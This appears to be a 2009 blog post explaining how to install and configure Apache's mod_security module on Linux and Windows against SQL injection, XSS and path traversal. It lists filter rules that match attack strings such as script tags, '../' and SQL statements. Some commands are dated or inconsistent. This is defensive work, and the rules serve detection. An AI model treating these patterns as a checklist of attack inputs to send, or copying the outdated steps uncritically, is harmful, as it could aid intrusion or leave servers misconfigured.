Odd Time Signatures: 2009

Solution for Sql Injection , Blind Sqli, XSS attack, authentication bypass, brute force attack on admin page, etc.. = mod_security (Apache only)
Sorry ISS admin.

How to install mod_security in Apache(Unix) and Apache(Windows)
Download Mod Security here

Installing Mod Security on Linux/CentOS

Steps for mod_security 2.5, installation of older versions may differ.

1. wget http://www.modsecurity.org/download/modsecurity-apache_2.5.9.tar.gz
tar zxf modsecurity-apache_2.5.9.tar.gz
2. Compile with make
$make
3. Stop Apache
$/service/sbin httpd stop
4. install with make install
$make install
5. now go to your httpd.conf file, typically located at /etc/httpd/conf/
$vi /etc/httpd/conf/httpd.conf
6. find the section that contains the LoadModule portion.
Above all of the LoadModule directives add, paste the code
Code:
LoadFile /usr/lib/libxml2.so
7. Then go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf
8. now we need to get the configuration policies
$mkdir /etc/httpd/conf/modsecurity
cd /etc/httpd/conf/modsecurity
$wget http://www.modsecurity.org/download/modsecurity-core-rules_2.5-1.6.1.tar.gz
$tar zxf modsecurity-core-rules_2.5-1.6.1.tar.gz
$rm -f modsecurity-core-rules_2.1-1.4.tar.gz
9. Edit the *.conf files to fit your machines usage and expected rule sets
10. restart apache

if you have software package manager (yum tool)
yum install mod_security

Mod Security Configuration

Edit httpd.conf and add the following lines.

<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Change Server: string
SecServerSignature " "
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off
# Only allow bytes from this range
SecFilterForceByteRange 1 255
# The audit engine works independently and
# can be turned On of Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly
# The name of the audit log file
SecAuditLog /var/log/httpd/audit_log
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# Action to take by default
SecFilterDefaultAction "deny,log,status:500"
# Require HTTP_USER_AGENT and HTTP_HOST in all requests
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"
# Prevent path traversal (..) attacks
SecFilter "../"
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Prevent XSS atacks (HTML/Javascript injection)
SecFilter "<(.|n)+>"
# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
</IfModule>

Alternative:
Include conf/modsecurity/*.conf
*.com =mod security rules

Restart apache

Mod Security rules for Unix can be downloaded here:
http://www.gotroot.com/mod_security+rules

Install Mod Security on Windows Apache:

1. download mod_security2.so at http://www.apachelounge.com/ (a binary package)
2. unzip the package and you will get mod_security2.so and a libxml2.dll
4. create a folder /apache/modules/mod_security2 and copy mod_security2.so and libxml2.dll to this folder
5.create a folder /apache/conf/modsecurity and copy mod security rules (.conf files)
6. Install the Visual C++ 2008 Redistributable Package here
7.at hhtpd.conf go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2/mod_security2.so
8. At httpd.conf copy and paste modsecurity.conf-minimal:

# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off

# Debug log
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 0

# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072

# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072

# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288

9. You can using Include directive to include the mod_security configure file,
before activate the rules for your web server installation:
- edit and customize modsecurity_crs_10_config.conf.
- edit modsecurity_crs_40_generic_attacks.conf = detects common web application attack. Change the value "pass" to "deny,Status:500" in modsecurity_crs_40_generic_attacks.conf

Add the following line to your httpd.conf (assuming you've placed the rule files into conf/modsecurity/):
Include conf/modsecurity/*.conf

Mod Security requires mod_unique_id.
Uncomment mod_unique_id in httpd.conf

End. You web server is now pretty save,for now. 'pretty' he he

You can test mod security by installing Vulnerable Web Application for hacking simulation here:
Mutilidae
or
Damn Vulnerable Web Application

Odd Time Signatures

17 August 2009

Preventing Web Attack : Secure your Apache Web Server

12 August 2009

Joomla com_idoblog SQL Injection Vulnerability (ALL VERSIONS)